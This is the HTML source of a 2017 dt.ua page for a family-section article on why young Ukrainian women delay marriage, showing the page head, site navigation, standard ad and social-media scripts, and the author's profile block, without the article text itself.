<!DOCTYPE html>
<html itemid='https://dt.ua/family/chomu-suchasni-ukrayinski-divchata-ne-pospishayut-zamizh-257570_.html' id=''>
  <head>
    <meta content='text/html; charset=utf-8' http-equiv='content-type' />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <link rel='stylesheet' type='text/css' href='/static/style/style.css' />
    <link rel='alternate' type='application/rss+xml' title='' href='/rss' />
    <!--[if IE 6]><script type='text/javascript' src='/static/js/iehover.js'></script><![endif]-->
  
<link rel='shortcut icon' href='/favicon.ico' />
<link rel="canonical" href="https://dt.ua/family/chomu-suchasni-ukrayinski-divchata-ne-pospishayut-zamizh-257570_.html"/>
<link rel="alternate" href="https://dt.ua/family/chomu-suchasni-ukrayinski-divchata-ne-pospishayut-zamizh-257570_.html" hreflang="uk" />
<link rel="alternate" href="https://dt.ua/family/chomu-suchasni-ukrayinski-divchata-ne-pospishayut-zamizh-257570_.html" hreflang="x-default" />
<link href='https://fonts.googleapis.com/css?family=Roboto+Slab:700&subset=cyrillic' rel='stylesheet' type='text/css'>
<script>
                                 !function(f,b,e,v,n,t,s){if(f.fbq)return;n=f.fbq=function(){n.callMethod?
                                 n.callMethod.apply(n,arguments):n.queue.push(arguments)};if(!f._fbq)f._fbq=n;
                                 n.push=n;n.loaded=!0;n.version='2.0';n.queue=[];t=b.createElement(e);t.async=!0;
                                 t.src=v;s=b.getElementsByTagName(e)[0];s.parentNode.insertBefore(t,s)}(window,
                                 document,'script','https://connect.facebook.net/en_US/fbevents.js');
                                 fbq('init', '277876779342229', {
                                 em: 'insert_email_variable,'
                                 });
                                 fbq('track', 'PageView');
                                 </script>
                                 <noscript><img height='1' width='1' style='display:none'
                                 src='https://www.facebook.com/tr?id=277876779342229&ev=PageView&noscript=1'
                                 /></noscript>
<script type='text/javascript' src='https://platform.twitter.com/widgets.js'></script>
<script src='https://apis.google.com/js/platform.js' async defer></script>
<link rel='publisher' href='https://plus.google.com/b/116699980639406409904/' />
<meta property='fb:admins' content='100000708653400,100000936143901,1728927826,100000201934702' />
<meta property='fb:app_id' content='350471815115154' />
<script type='text/javascript'>
        var googletag = googletag || {};
        googletag.cmd = googletag.cmd || [];
        (function() {
          var gads = document.createElement('script');
          gads.async = true;
          gads.type = 'text/javascript';
          var useSSL = 'https:' == document.location.protocol;
          gads.src = (useSSL ? 'https:' : '') +
            '//www.googletagservices.com/tag/js/gpt.js';
          var node = document.getElementsByTagName('script')[0];
          node.parentNode.insertBefore(gads, node);
        })();
      </script>

      <script type='text/javascript'>
        googletag.cmd.push(function() {
          googletag.defineSlot('/17774365/zn.ua', [300, 250], 'div-gpt-ad-1461742398816-0').addService(googletag.pubads());
          googletag.pubads().enableSingleRequest();
          googletag.enableServices();
        });
      </script>
<meta itemprop="description" name="description" content="" />
<meta property="article:published" itemprop="datePublished" content="2017-10-20" />
<meta property="og:title" content="Чому сучасні українські дівчата  не поспішають заміж" />
<meta property="og:description" content="" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://dt.ua/family/chomu-suchasni-ukrayinski-divchata-ne-pospishayut-zamizh-257570_.html" />
<meta property="og:image" content="https://image.zn.ua/media/images/645x426/Oct2017/187699.jpg" />
<meta property="og:site_name" content="DT.ua" />
<meta name="twitter:card" content="summary_large_image" />
<meta name="twitter:site" content="@dtua" />
<meta name="twitter:title" content="Чому сучасні українські дівчата  не поспішають заміж" />
<meta name="twitter:description" content="" />
<meta name="twitter:creator" content="@dtua" />
<meta name="twitter:image:src" content="https://image.zn.ua/media/images/645x426/Oct2017/187699.jpg" />
<meta name="twitter:domain" content="dt.ua" />
<link rel="alternate" href="https://zn.ua/family/pochemu-sovremennye-ukrainki-ne-speshat-zamuzh-263520_.html" hreflang="ru" />
<title>Чому сучасні українські дівчата  не поспішають заміж - Сімейне коло - dt.ua</title>
<meta name='keywords' content='Сімейне коло,Наталія Михайленко' />
<link rel='stylesheet' type='text/css' href='/static/style/jquery.simplemodal.css' />
<link rel='stylesheet' type='text/css' href='/static/style/svc.passport.ui.css' />
<link rel='stylesheet' type='text/css' href='/static/style/jquery.mCustomScrollbar.css' />
<link rel='stylesheet' type='text/css' href='/static/slick/slick.css' />
<link rel='stylesheet' type='text/css' href='/static/slick/slick-theme.css' />
<link rel='stylesheet' type='text/css' href='/static/style/section.article.css' />
<link rel='stylesheet' type='text/css' href='/static/style/comments.css' />
<script type='text/javascript' src='/static/js/json.min.js'></script>
<script type='text/javascript' src='/static/js/jquery.min.js'></script>
<script type='text/javascript' src='/static/js/jquery.form.js'></script>
<script type='text/javascript' src='/static/js/jquery.simplemodal.js'></script>
<script type='text/javascript' src='/static/js/jquery.mCustomScrollbar.concat.min.js'></script>
<script type='text/javascript' src='/static/js/core.js'></script>
<script type='text/javascript' src='/static/js/core.ajax.js'></script>
<script type='text/javascript' src='/static/js/core.passport.js'></script>
<script type='text/javascript' src='/static/js/box_dtua2.js'></script>
<script type='text/javascript' src='/static/js/owl.carousel.min.js'></script>
<script type='text/javascript' src='/static/slick/slick.js'></script>
<script type='text/javascript' src='//s7.addthis.com/js/300/addthis_widget.js#pubid=ofedorov'></script>
<script type='text/javascript' src='https://pro.hit.gemius.pl/gstream.js'></script>
<script type='text/javascript' src='/static/js/adriver.core.2.js'></script>
<script type='text/javascript'>
try{$(document).ready(function(){jQuery.core.ajax.init();});}catch(e){};
var section_id = '';
var pp_gemius_identifier = new String('');
var N = 2; var ar_bn1= Math.floor(Math.random()*N+1);
var S_ID = '60448';
var R_ID = '60004';
var A_ID = '257570';
try{$(document).ready(function(){box_dtua2.comments.init();});}catch(e){};
</script>
</head>
  <body class=''>

    <div id="fb-root"></div>
    <script>
      window.fbAsyncInit = function() {
      FB.init({appId: '350471815115154', xfbml: true, version: 'v2.1'});
      FB.Event.subscribe('edge.create', function(response) {
      document.cookie ='fbliked=true; expires=Thu, 2 Aug 2030 20:47:11 UTC; path=/'
      });
      };
      (function(d, s, id){
      var js, fjs = d.getElementsByTagName(s)[0];
      if (d.getElementById(id)) {return;}
      js = d.createElement(s); js.id = id;
      js.src = "https://connect.facebook.net/uk_UA/sdk.js";
      fjs.parentNode.insertBefore(js, fjs);
      }(document, 'script', 'facebook-jssdk'));
    </script>
    <div id='wrapper'>
      <div id='header'>
  <div class='container'>
    <a class='top_logo' href='/'></a>
     <div class='menu'>
  <div class='menu_mob'>
    <span class='first'></span>
    <span class='second'></span>
    <span class='fird'></span>
  </div>
  
    <div class='menu_item  '>
      <a class='link' href='//dt.ua/POLITICS'>Політика</a>
      
        <div class='top_arrow'></div>
        <div class='submenu'>
          <div class='submenu_article'>
            
            <div class='subitem'>
              <a class='sublink' href='/POLITICS/poklonska-zaperechuye-nayavnist-u-neyi-gromadyanstva-ukrayini-257584_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Aug2015/123413.jpg' alt='Поклонська: Янукович підписав указ про позбавлення мене громадянства, знаходячись у Ростові'>
                <span class='sub_title'>Поклонська заперечує наявність у неї громадянства України<span>
              </a>
            </div>
            
            <div class='subitem'>
              <a class='sublink' href='/POLITICS/ugorschina-prodovzhit-blokuvati-integraciyu-ukrayini-v-yevrosoyuz-posol-257554_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Apr2015/113893.jpg' alt='Попередня заява Будапешта залишається в силі'>
                <span class='sub_title'>Угорщина продовжить блокувати інтеграцію України в Євросоюз &ndash; посол<span>
              </a>
            </div>
            
            <div class='subitem'>
              <a class='sublink' href='/POLITICS/litvin-ogolosiv-pro-vihid-z-grupi-volya-narodu-257548_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Oct2017/187685.jpeg' alt='Литвину більше не потрібна &quot;Воля народу&quot;'>
                <span class='sub_title'>Литвин оголосив про вихід з групи &quot;Воля народу&quot;<span>
              </a>
            </div>
            
            <div class='subitem'>
              <a class='sublink' href='/POLITICS/poklonska-dosi-zalishayetsya-gromadyankoyu-ukrayini-257547_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/May2015/115649.jpg' alt='Депутат від путінської &quot;Єдиної Росії&quot; досі має українське громадянство'>
                <span class='sub_title'>Поклонська досі залишається громадянкою України<span>
              </a>
            </div>
            
            <div class='subitem'>
              <a class='sublink' href='/POLITICS/nabu-i-sap-ne-zminyuvali-kvalifikaciyu-zlochinu-polyakova-257541_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Oct2017/187617.jpg' alt='НАБУ і САП залишають незмінною свою позицію щодо кваліфікації злочину Полякова'>
                <span class='sub_title'>НАБУ і САП не змінювали кваліфікацію злочину Полякова<span>
              </a>
            </div>
            
            <br/>
            <a class='section_link' href='/POLITICS'>Усі новини розділу Політика</a>
          </div>
        </div>

      
    </div>
  
    <div class='menu_item  '>
      <a class='link' href='//dt.ua/ECONOMICS'>Економіка</a>
      
        <div class='top_arrow'></div>
        <div class='submenu'>
          <div class='submenu_article'>
            
            <div class='subitem'>
              <a class='sublink' href='/ECONOMICS/seredniy-rozmir-pensiy-v-ukrayini-pislya-pererahunku-viris-na-560-grn-257540_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Jan2016/137064.jpg' alt='У жовтні платоспроможний попит підвищився на 6,4 млрд грн'>
                <span class='sub_title'>Середній розмір пенсій в Україні після перерахунку виріс на 560 грн<span>
              </a>
            </div>
            
            <div class='subitem'>
              <a class='sublink' href='/ECONOMICS/pidvischeni-pensiyi-vrahuyut-pri-priznachenni-subsidiy-z-travnya-2018-roku-reva-257533_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Feb2017/168655.jpg' alt='Рева переконаний, що нові пенсії не призведуть до зростання цін'>
                <span class='sub_title'>Підвищені пенсії врахують при призначенні субсидій з травня 2018 року &ndash; Рева<span>
              </a>
            </div>
            
            <div class='subitem'>
              <a class='sublink' href='/ECONOMICS/rothschild-dopomozhe-naftogazu-v-poshukah-partnera-po-upravlinnyu-gts-257507_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Jun2016/149520.jpg' alt='Rothschild S. p.A. займеться анбандлингом української ГТС'>
                <span class='sub_title'>Rothschild допоможе &quot;Нафтогазу&quot; в пошуках партнера з управління ГТС<span>
              </a>
            </div>
            
            <div class='subitem'>
              <a class='sublink' href='/ECONOMICS/sud-virishiv-povernuti-u-derzhvlasnist-privatizovaniy-ahmetovim-ukrtelekom-257456_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Jun2013/62663.jpg' alt='&quot;Укртелеком&quot; вирішили повернути в держвласність'>
                <span class='sub_title'>Суд вирішив повернути у держвласність приватизований Ахметовим &quot;Укртелеком&quot;<span>
              </a>
            </div>
            
            <div class='subitem'>
              <a class='sublink' href='/ECONOMICS/sud-dozvoliv-styagnuti-171-mlrd-griven-shtrafu-zi-vsogo-mayna-gazpromu-petrenko-257409_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Sep2015/125801.jpg' alt='Суд дозволив стягувати штраф і з майна &quot;Газпрому&quot;'>
                <span class='sub_title'>Суд дозволив стягнути 171 млрд гривень штрафу зі всього майна &quot;Газпрому&quot; - Петренко<span>
              </a>
            </div>
            
            <br/>
            <a class='section_link' href='/ECONOMICS'>Усі новини розділу Економіка</a>
          </div>
        </div>

      
    </div>
  
    <div class='menu_item  '>
      <a class='link' href='//dt.ua/UKRAINE'>Україна</a>
      
        <div class='top_arrow'></div>
        <div class='submenu'>
          <div class='submenu_article'>
            
            <div class='subitem'>
              <a class='sublink' href='/UKRAINE/advokat-zaycevoyi-zvinuvachuye-v-dtp-u-harkovi-vodiya-volkswagen-257591_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Oct2017/187697.jpg' alt='Козир запропонувала дочекатися висновків судової авто-технічної експертизи'>
                <span class='sub_title'>Адвокат Зайцевої звинувачує в ДТП у Харкові водія Volkswagen<span>
              </a>
            </div>
            
            <div class='subitem'>
              <a class='sublink' href='/UKRAINE/vinuvaticya-dtp-u-harkovi-zayceva-naperedodni-vzhivala-narkotiki-prokuror-257561_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Oct2017/187689.jpg' alt='Адвокат Зайцевої заявила про те, що ця інформація стала для неї несподіванкою'>
                <span class='sub_title'>Винуватиця ДТП у Харкові Зайцева напередодні вживала наркотики &ndash; прокурор<span>
              </a>
            </div>
            
            <div class='subitem'>
              <a class='sublink' href='/UKRAINE/dtp-u-harkovi-zayceva-zayavila-pro-svoyu-nevinnist-u-zagibeli-pishohodiv-257559_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Oct2017/187689.jpg' alt='Зайцева вважає себе невинною'>
                <span class='sub_title'>ДТП у Харкові: Зайцева заявила про свою невинність у загибелі пішоходів<span>
              </a>
            </div>
            
            <div class='subitem'>
              <a class='sublink' href='/UKRAINE/blizko-150-aktivistiv-prodovzhuyut-akciyu-pid-radoyu-257530_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Oct2017/187417.jpg' alt='На місці проведення акції конфліктних ситуацій немає'>
                <span class='sub_title'>Близько 150 активістів продовжують акцію під Радою<span>
              </a>
            </div>
            
            <div class='subitem'>
              <a class='sublink' href='/UKRAINE/treyd-kommoditi-vidsudilo-u-minoboroni-8-mln-griven-bankivskoyi-garantiyi-257525_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Apr2017/172744.jpg' alt='Суд зобов&#039;язав Міністерство оборони повернути банку-гаранту компанії &quot;Трейд коммодіті&quot; 8,19 млн гривень банківського зобов&#039;язання'>
                <span class='sub_title'>&quot;Трейд коммодіті&quot; відсудило у Міноборони 8 млн гривень банківської гарантії<span>
              </a>
            </div>
            
            <br/>
            <a class='section_link' href='/UKRAINE'>Усі новини розділу Україна</a>
          </div>
        </div>

      
    </div>
  
    <div class='menu_item  '>
      <a class='link' href='//dt.ua/WORLD'>Світ</a>
      
        <div class='top_arrow'></div>
        <div class='submenu'>
          <div class='submenu_article'>
            
            <div class='subitem'>
              <a class='sublink' href='/WORLD/dodona-pozbavili-prava-priznachiti-ministra-oboroni-moldovi-257589_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Jan2017/165660.jpg' alt='Додона визнали недієздатним'>
                <span class='sub_title'>Додона позбавили права призначити міністра оборони Молдови<span>
              </a>
            </div>
            
            <div class='subitem'>
              <a class='sublink' href='/WORLD/v-yevrosoyuzi-pochali-gotuvatisya-do-novogo-etapu-peregovoriv-schodo-brexit-257566_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Jun2016/151871.jpg' alt='Лідери ЄС дали &quot;зелене світло&quot; другій фазі Brexit-переговорів.'>
                <span class='sub_title'>В Євросоюзі почали готуватися до нового етапу переговорів щодо Brexit<span>
              </a>
            </div>
            
            <div class='subitem'>
              <a class='sublink' href='/WORLD/ispaniya-hoche-provesti-dostrokovi-vibori-v-kataloniyi-257543_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Apr2016/145128.jpg' alt='В січні можуть відбутися дострокові вибори в Каталонії.'>
                <span class='sub_title'>Іспанія хоче провести дострокові вибори в Каталонії<span>
              </a>
            </div>
            
            <div class='subitem'>
              <a class='sublink' href='/WORLD/smolenska-katastrofa-komisiya-pidtverdila-moment-vibuhu-na-bortu-litaka-257539_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Sep2016/157803.jpg' alt='На борту літака з Качиньським все таки був вибух до зіткнення з землею.'>
                <span class='sub_title'>Смоленська катастрофа: комісія підтвердила момент вибуху на борту літака<span>
              </a>
            </div>
            
            <div class='subitem'>
              <a class='sublink' href='/WORLD/yevrosoyuz-skorotit-finansuvannya-turechchini-v-yes-257529_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Mar2016/142126.jpg' alt='Туреччина, очевидно, втратить гроші ЄС на вступ до блоку.'>
                <span class='sub_title'>Євросоюз скоротить фінансування Туреччини в ЄС<span>
              </a>
            </div>
            
            <br/>
            <a class='section_link' href='/WORLD'>Усі новини розділу Світ</a>
          </div>
        </div>

      
    </div>
  
    <div class='menu_item  '>
      <a class='link' href='//dt.ua/TECHNOLOGIES'>Технології</a>
      
        <div class='top_arrow'></div>
        <div class='submenu'>
          <div class='submenu_article'>
            
            <div class='subitem'>
              <a class='sublink' href='/TECHNOLOGIES/koristuvachi-google-play-zmozhut-zapuskati-programi-bez-vstanovlennya-na-pristriy-257586_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/May2016/148209.jpg' alt='Додатки з Goople Play тепер можна не встановлювати на смартфон'>
                <span class='sub_title'>Користувачі Google Play зможуть запускати програми без встановлення на пристрій<span>
              </a>
            </div>
            
            <div class='subitem'>
              <a class='sublink' href='/TECHNOLOGIES/zond-nasa-sprobuye-rozkriti-tayemnicyu-pohodzhennya-vodi-na-cereri-257562_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Mar2016/142899.jpg' alt='Зонд Dawn зблизиться з Церерою на рекордну відстань'>
                <span class='sub_title'>Зонд NASA спробує розкрити таємницю походження води на Церері<span>
              </a>
            </div>
            
            <div class='subitem'>
              <a class='sublink' href='/TECHNOLOGIES/vcheni-pov-yazali-vidsutnist-signaliv-vid-inoplanetyan-z-poshirenistyu-planet-okeaniv-257551_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Jan2016/137691.jpg' alt='Сигнали інопланетних цивілізацій може приховувати товща льоду'>
                <span class='sub_title'>Вчені пов&#039;язали відсутність сигналів від інопланетян з поширеністю планет-океанів<span>
              </a>
            </div>
            
            <div class='subitem'>
              <a class='sublink' href='/TECHNOLOGIES/astronomi-rozkrili-tayemnicyu-zagadkovih-spalahiv-na-misyaci-257546_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Apr2016/144670.jpg' alt='На поверхню Місяця падають мікрометеорити'>
                <span class='sub_title'>Астрономи розкрили таємницю загадкових спалахів на Місяці<span>
              </a>
            </div>
            
            <div class='subitem'>
              <a class='sublink' href='/TECHNOLOGIES/vcheni-pov-yazali-kozhnu-shostu-smert-na-zemli-z-zabrudnennyami-257537_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Oct2017/187680.png' alt='Найбільша кількість смертей пов&#039;язана з забрудненням повітря'>
                <span class='sub_title'>Вчені пов&#039;язали кожну шосту смерть на Землі з забрудненнями<span>
              </a>
            </div>
            
            <br/>
            <a class='section_link' href='/TECHNOLOGIES'>Усі новини розділу Технології</a>
          </div>
        </div>

      
    </div>
  
    <div class='menu_item  '>
      <a class='link' href='//dt.ua/CULTURE'>Культура</a>
      
        <div class='top_arrow'></div>
        <div class='submenu'>
          <div class='submenu_article'>
            
            <div class='subitem'>
              <a class='sublink' href='/CULTURE/rezhiser-devid-linch-vidvidaye-ukrayinu-257553_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Oct2015/129920.jpg' alt='Девід Лінч відвідає Київ'>
                <span class='sub_title'>Режисер Девід Лінч відвідає Україну<span>
              </a>
            </div>
            
            <div class='subitem'>
              <a class='sublink' href='/CULTURE/pismennik-rozkriv-tayemnicyu-krishtalevoyi-kuli-v-ruci-hrista-na-polotni-da-vinchi-257447_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Oct2017/186809.jpg' alt='У новій біографії да Вінчі розкрита таємниця картини &quot;Спаситель світу&quot;'>
                <span class='sub_title'>Письменник розкрив таємницю кришталевої кулі в руці Христа на полотні да Вінчі<span>
              </a>
            </div>
            
            <div class='subitem'>
              <a class='sublink' href='/CULTURE/francuzka-aktrisa-daniel-dar-ye-pomerla-u-vici-100-rokiv-257427_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Oct2017/187561.jpg' alt='Даніель Дар`є  померла у віці 100 років'>
                <span class='sub_title'>Французька актриса Даніель Дар&#039;є померла у віці 100 років<span>
              </a>
            </div>
            
            <div class='subitem'>
              <a class='sublink' href='/CULTURE/gurt-leningrad-predstaviv-klip-na-pisnyu-kandidat-257338_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Oct2017/187450.jpg' alt='Герой кліпу співає про те, як вирішив стати кандидатом у президенти'>
                <span class='sub_title'>Гурт &quot;Ленинград&quot; представив кліп на пісню &quot;Кандидат&quot;<span>
              </a>
            </div>
            
            <div class='subitem'>
              <a class='sublink' href='/CULTURE/rozkrito-nazvu-solnogo-filmu-pro-hana-solo-257282_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Oct2017/187404.jpg' alt='Фільм отримав назву &quot;Соло 
історія Зоряних війн&quot;'>
                <span class='sub_title'>Розкрито назву сольного фільму про Хана Соло<span>
              </a>
            </div>
            
            <br/>
            <a class='section_link' href='/CULTURE'>Усі новини розділу Культура</a>
          </div>
        </div>

      
    </div>
  
    <div class='menu_item  '>
      <a class='link' href='//dt.ua/SPORT'>Спорт</a>
      
        <div class='top_arrow'></div>
        <div class='submenu'>
          <div class='submenu_article'>
            
            <div class='subitem'>
              <a class='sublink' href='/SPORT/prem-yer-liga-anons-de-divitisya-matchi-13-go-turu-257544_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Oct2017/187681.jpg' alt='&quot;Динамо&quot; і &quot;Шахтар&quot; зіграють 22 жовтня'>
                <span class='sub_title'>Прем&#039;єр-ліга: анонс, де дивитися матчі 13-го туру<span>
              </a>
            </div>
            
            <div class='subitem'>
              <a class='sublink' href='/SPORT/dinamo-zigralo-u-rezultativnu-nichiyu-z-yang-boyz-u-lizi-yevropi-257499_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Oct2017/187614.jpg' alt='&quot;Динамо&quot; зіграло внічию, двічі відігравшись'>
                <span class='sub_title'>&quot;Динамо&quot; зіграло у результативну нічию з &quot;Янг Бойз&quot; у Лізі Європи<span>
              </a>
            </div>
            
            <div class='subitem'>
              <a class='sublink' href='/SPORT/dinamo-yang-boyz-onlayn-translyaciya-matchu-257407_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Oct2017/187555.jpg' alt='Початок матчу - о 22:05'>
                <span class='sub_title'>&quot;Динамо&quot; &ndash; &quot;Янг Бойз&quot;: ключові моменти матчу, відео голів<span>
              </a>
            </div>
            
            <div class='subitem'>
              <a class='sublink' href='/SPORT/zorya-zdobula-peremogu-nad-gertoyu-u-lvovi-257493_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Oct2017/187605.jpg' alt='&quot;Зоря&quot; здобула другу поспіль єврокубкову перемогу'>
                <span class='sub_title'>&quot;Зоря&quot; здобула перемогу над &quot;Гертою&quot; у Львові<span>
              </a>
            </div>
            
            <div class='subitem'>
              <a class='sublink' href='/SPORT/liga-chempioniv-rezultati-vsih-matchiv-18-zhovtnya-turnirni-tablici-257376_.html'>
                <img class='sub_img' src='//image.zn.ua/media/images/300x250/Oct2017/187501.jpg' alt='ПСЖ розгромив &quot;Андерлехт&quot;'>
                <span class='sub_title'>Ліга чемпіонів: результати всіх матчів 18 жовтня, турнірні таблиці<span>
              </a>
            </div>
            
            <br/>
            <a class='section_link' href='/SPORT'>Усі новини розділу Спорт</a>
          </div>
        </div>

      
    </div>
  
    <div class='menu_item more '>
      <a class='link' href='//dt.ua/'>Ще</a>
      
        <div class='top_arrow'></div>
        <div class='submenu'>
          
          <div class='subitem '>
            <a class='sublink' href='/multimedia'>
              Фото та відео
            </a>
          </div>
          
          <div class='subitem '>
            <a class='sublink' href='/project'>
              Спецпроекти
            </a>
          </div>
          
          <div class='subitem '>
            <a class='sublink' href='/interview'>
              Інтерв&#039;ю
            </a>
          </div>
          
          <div class='subitem '>
            <a class='sublink' href='/gazeta/archive/'>
              Архів номерів
            </a>
          </div>
          
          <div class='subitem '>
            <a class='sublink' href='/company-news'>
              Новони компаній
            </a>
          </div>
          
        </div>

      
    </div>
  
</div>




    <a class='top_gazeta' href='/gazeta/issue/1125'>
      <span class='top_line'>Випуск №38</span>
      <span class='bottom_line'>14 жовтня-20 жовтня</span>
    </a>
    <a class='top_like' href='/fond'>
      Підтримати ZN.ua
    </a>
    
    <a href='javascript:void(0)' class='top_user passport open-login 1'>
      <img class='img' src='/blank.gif' alt='' title='' />
      <div class='top_arrow'></div>
      <span class='h-message'>
        <span class='text'>Log in</span>
      </span>
    </a>
    

    

    <div class='lang'>
      <a class='lang_item' href='//zn.ua/family/pochemu-sovremennye-ukrainki-ne-speshat-zamuzh-263520_.html'>RU</a>
      <span class='lang_item'>/</span>
      <span class='lang_item'>UA</span>
    </div>
    <!--//<div class='top_search'>//-->
        <div class='top_search_cont'>
          <span class='top_search_btn'> </span>
          <form class='top_search' name='top_search' id='top_search' action="/search/" >
            <div class='form_cont'>
              <input type='text' name='query' value='' placeholder='' id='top_search_text' class='top_search_text' required />
              <div class='pr_filters ac-container'>
                <div>
                  <input id="ac-1" class="acc-1" name="accordion-1" type="checkbox">
                  <label for="ac-1" class='acc-2'>Шукати у</label>
                  <div class="ac-x">
                    <div>
                      <label class='check_label' for="date_start_ch">за датою</label>
                      <input class='checkbox' id="date_start_ch" name="date_start_ch" type="checkbox"  />
                      <div>
                        <input class='text' id="date_start" name="date_start" type="text" value='' placeholder='з' />
                        <span class='divider'> - </span>
                        <input class='text' id="date_end" name="date_end" type="text" value='' placeholder='по' />
                      </div>
                    </div>
                    <div>
                      <input class='checkbox' id="news" name="news" type="checkbox"  checked="checked" />
                      <label for="news">у новинах</label>
                    </div>
                    <div>
                      <input class='checkbox' id="author" name="author" type="checkbox"  />
                      <label for="author">за автором</label>
                    </div>
                    <div>
                      <input class='checkbox' id="article" name="article" type="checkbox"  />
                      <label for="article">у статтях</label>
                    </div>
                    <div>
                      <input class='checkbox' id="multimedia" name="photo_video" type="checkbox"  />
                      <label for="photo_video">у фото й відео</label>
                    </div>
                    <div>
                      <input class='checkbox' id="interview" name="interview" type="checkbox"  />
                      <label for="interview">в інтерв’ю</label>
                    </div>
                  </div>
                </div>
              </div>
              <input type="submit" class='top_search_btn_' value="Шукати">
            </div>
          </form>
        </div>
    <!--//</div>//-->
  </div>
</div>

<!--  AdRiver code START. Type:AjaxJS Site: ZN BN:20 -->
<div id="adriver_banner_1492169494" style="display:block; text-align:center;"></div>

<script type="text/javascript">
new adriver("adriver_banner_1492169494", {sid:161943, bt:52, bn:1});
</script>

<!--  AdRiver code END  -->

<!--  AdRiver code START. Type:AjaxJS Site: ZN BN:20 -->
<div id="adriver_banner_1554739686"></div>
  <script type="text/javascript">
  new adriver("adriver_banner_1554739686", {sid:161943, bt:52, bn:20});
</script>
<!--  AdRiver code END  -->

<div style="clear: both"></div>

<script type='text/javascript'>
  $(function() {

    $('#header .menu_mob').click(function(){
      $('#header .menu').toggleClass('open');
    })
    $('#header .menu a').click(function(){
      $('#header .menu').removeClass('open');
    })

    $('#header .top_search_btn').live('click',function(){
      $(this).toggleClass('active');
      $('#top_search').toggleClass('active');
    });
    $('#header .top_search_close').live('click',function(){
      $('#top_search').removeClass('active');
    });
    $('#header .top_search .querry').live('click',function(){
      $('#top_search').addClass('active');
    });
    $('#header #querry').blur(function(){
      setTimeout(function(){
        $('#top_search').removeClass('active');}
      ,200);
    });

  });
</script>

      <div id='container'>
        <div id='holder'>
          <!--#block_left [START]-->
            <div id='left'>
              <div class='central_article'>

  
    <div class='top_article'>
      <h1 class='title'>Чому сучасні українські дівчата  не поспішають заміж
        
        
      </h1>

      <span class='date'>
        20 жовтня, 16:35
      </span>
      <a class='print' href='/article/print/family/chomu-suchasni-ukrayinski-divchata-ne-pospishayut-zamizh-257570_.html' title='Версія для друку' onclick='window.open("/article/print/family/chomu-suchasni-ukrayinski-divchata-ne-pospishayut-zamizh-257570_.html", "doc_print", "toolbar=0,scrollbars=1,location=0,statusbar=0,menubar=0,resizable=1,width=660,height=500"); return false;'>
      Роздрукувати
      </a>
    </div>
  

  <div class='article_left'>
      <div class='authors_block'>
    <ul class='authors_imgs'>
      
        <li class='auth_img'>
          <a class='' href='/author/nataliya-mihaylenko'>
            <img class='img' src='//image.zn.ua/media/images/300x250/Jun2017/177609.jpg' alt='Наталія Михайленко'>
          </a>
        </li>
      
    </ul>
    <div class='auth_info'>
      <span class='info_title'>
        Автор
      </span>
      <ul class='auth_list'>
        
          <li class='auth_item'>
            <a class='auth_link' href='/author/nataliya-mihaylenko'>
              <span class='name'>
                Наталія Михайленко
              </span>
              <span class='post'>
                Наталія Михайленко - психолог "Дитячого реабілітаційного центру" у м.Охтирка
              </span>
            </a>
          </li>
        
      </ul>
      <div class='auth_articles_block'>
        <span class='auth_articles_list_title'>
          Статті автора
        </span>
        <ul class='auth_articles_list'>
        
          <li class='auth_article'>
            <a class='auth_article_link' href='/family/giperaktivnist-yak-vizhiti-z-legkoyu-ne-normoyu-253520_.html'>
              <span class='title'>
                Гіперактивність: як вижити з легкою не нормою
              </span>
              <span class='summary'>
                Життя гіперактивних дітей нелегке. Вони воюють не тільки з власним нездоров'ям, а й з осудом оточуючих.
              </span>
            </a>
            </li>
          
          <li class='auth_article'>
            <a class='auth_article_link' href='/family/radyanskiy-spadok-abo-chomu-rozruha-u-nas-v-golovi-251636_.html'>
              <span class='title'>
                Радянський спадок,   або Чому розруха  у нас в голові
              </span>
              <span class='summary'>
                Радянський спадок,   
 або Чому розруха  у нас в голові
              </span>
            </a>
            </li>
          
          <li class='auth_article'>
            <a class='auth_article_link' href='/family/chomu-diti-ne-hochut-doroslishati-248443_.html'>
              <span class='title'>
                Чому діти не хочуть дорослішати
              </span>
              <span class='summary'>
                Виховання самостійності.
              </span>
            </a>
            </li>
          
        </ul>
        
          <a class='auth_button' href='/author/nataliya-mihaylenko'>
            Всі статті автора
          </a>
        
